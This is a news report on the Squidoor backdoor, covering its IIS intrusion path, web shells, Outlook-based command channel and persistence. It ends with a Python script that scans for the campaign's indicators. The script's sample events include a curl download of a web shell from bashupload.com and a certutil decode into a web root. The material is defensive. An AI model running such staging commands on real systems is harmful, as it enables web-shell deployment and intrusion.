A sophisticated backdoor malware called “Squidoor” is being deployed by suspected Chinese threat actors against organizations across South America and Southeast Asia.
The malware, designed for exceptional stealth, offers attackers multiple methods to maintain persistent access to compromised networks while evading detection from advanced security systems.
Initial access is gained primarily through exploiting vulnerabilities in Internet Information Services (IIS) servers, followed by the deployment of multiple web shells that serve as persistent backdoors.
These web shells exhibit significant similarities in their structure and obfuscation techniques, suggesting a common origin.
Palo Alto Networks researchers identified that Squidoor is a sophisticated multi-platform backdoor built specifically to operate undetected in highly monitored and secured networks.
The malware exists in both Windows and Linux variants, demonstrating the threat actor’s commitment to compromising diverse environments regardless of operating system.
The technical sophistication of Squidoor is particularly evident in its communication mechanisms.
The Windows version supports ten different protocols for command and control (C2) communication, while the Linux version supports nine.
These methods include HTTP-based communication, reverse TCP/UDP connections, DNS tunneling, and even Microsoft Outlook mail API communication, allowing attackers to adapt to different network environments and security controls.
“The threat actor stored some of the web shells on bashupload.com and downloaded and decoded them using certutil,” according to the research report.
The attackers then used curl and Impacket to spread the web shells across different servers within compromised networks.
Outlook Transport Channel: A Stealthy Communication Vector
Perhaps the most innovative aspect of Squidoor is its ability to leverage Microsoft Outlook as a covert communication channel.
When configured to use this method, the malware logs into the Microsoft identity platform using a hard-coded refresh token.
It then queries the drafts folder in Outlook, searching for emails with specific subject line patterns containing randomly generated numbers that help differentiate between different Squidoor implants.
The communication flow involves sophisticated encoding and encryption techniques.
Email contents undergo multiple stages of processing: conversion using the CryptStringToBinaryA Windows API, Base64 decoding, a combination of AES and custom XOR decryption, and finally zlib decompression.
This deobfuscated content provides commands for Squidoor to execute, ranging from reconnaissance to payload injection.
For persistence, Squidoor creates a scheduled task named “MicrosoftWindowsAppIDEPolicyManager” that executes the malicious shellcode at regular intervals, ensuring the backdoor remains active even after system reboots.
The malware can also inject additional payloads into legitimate processes like mspaint.exe, conhost.exe, and taskhostw.exe to further conceal its activities.
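The staging behaviour (certutil decoding, curl pulling from bashupload.com) and the scheduled-task persistence described above can be turned into simple host-telemetry checks. The following is an added example written for this article, not code from Palo Alto Networks or from the report; the `key=value` event format and the sample events are constructed, and only the task name, staging domain and tool names come from the report.

```python
"""Flag Squidoor-related host indicators in constructed process/task events."""
import re
from dataclasses import dataclass

# Indicators named in the report; the logging format below is an assumption.
SQUIDOOR_TASK_NAME = "MicrosoftWindowsAppIDEPolicyManager"
STAGING_DOMAIN = "bashupload.com"

# Constructed sample telemetry in a simple key=value format (not real logs).
SAMPLE_EVENTS = [
    'event=process_create image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -decode C:\\Windows\\Temp\\a.txt C:\\inetpub\\wwwroot\\x.aspx"',
    'event=process_create image=C:\\Windows\\System32\\curl.exe '
    'cmdline="curl https://bashupload.com/abcd/shell.txt -o C:\\Windows\\Temp\\a.txt"',
    'event=task_create task_name=\\MicrosoftWindowsAppIDEPolicyManager author=SYSTEM',
    'event=process_create image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe readme.txt"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key="quoted value" or key=bare


@dataclass
class Finding:
    rule: str
    evidence: str


def parse_event(line: str) -> dict:
    """Split one key=value line into a dict; quoted values may contain spaces."""
    return {key: (quoted or bare) for key, quoted, bare in KV_RE.findall(line)}


def scan_events(events: list) -> list:
    """Apply the three indicator rules to parsed events, in input order."""
    findings = []
    for ev in events:
        kind = ev.get("event", "")
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "").lower()
        if kind == "process_create":
            # certutil used to fetch (-urlcache) or decode (-decode) staged web shells
            if image.endswith("certutil.exe") and ("-decode" in cmd or "-urlcache" in cmd):
                findings.append(Finding("certutil_decode", cmd))
            if STAGING_DOMAIN in cmd:
                findings.append(Finding("bashupload_staging", cmd))
        elif kind == "task_create":
            if ev.get("task_name", "").lstrip("\\").lower() == SQUIDOOR_TASK_NAME.lower():
                findings.append(Finding("squidoor_task_name", ev["task_name"]))
    return findings


def scan_lines(lines: list) -> list:
    """Convenience wrapper: raw lines in, findings out."""
    return scan_events([parse_event(line) for line in lines])
```

Payload injection into mspaint.exe, conhost.exe or taskhostw.exe is not visible in process-creation events alone and needs memory or API-level telemetry, so it is deliberately not covered here.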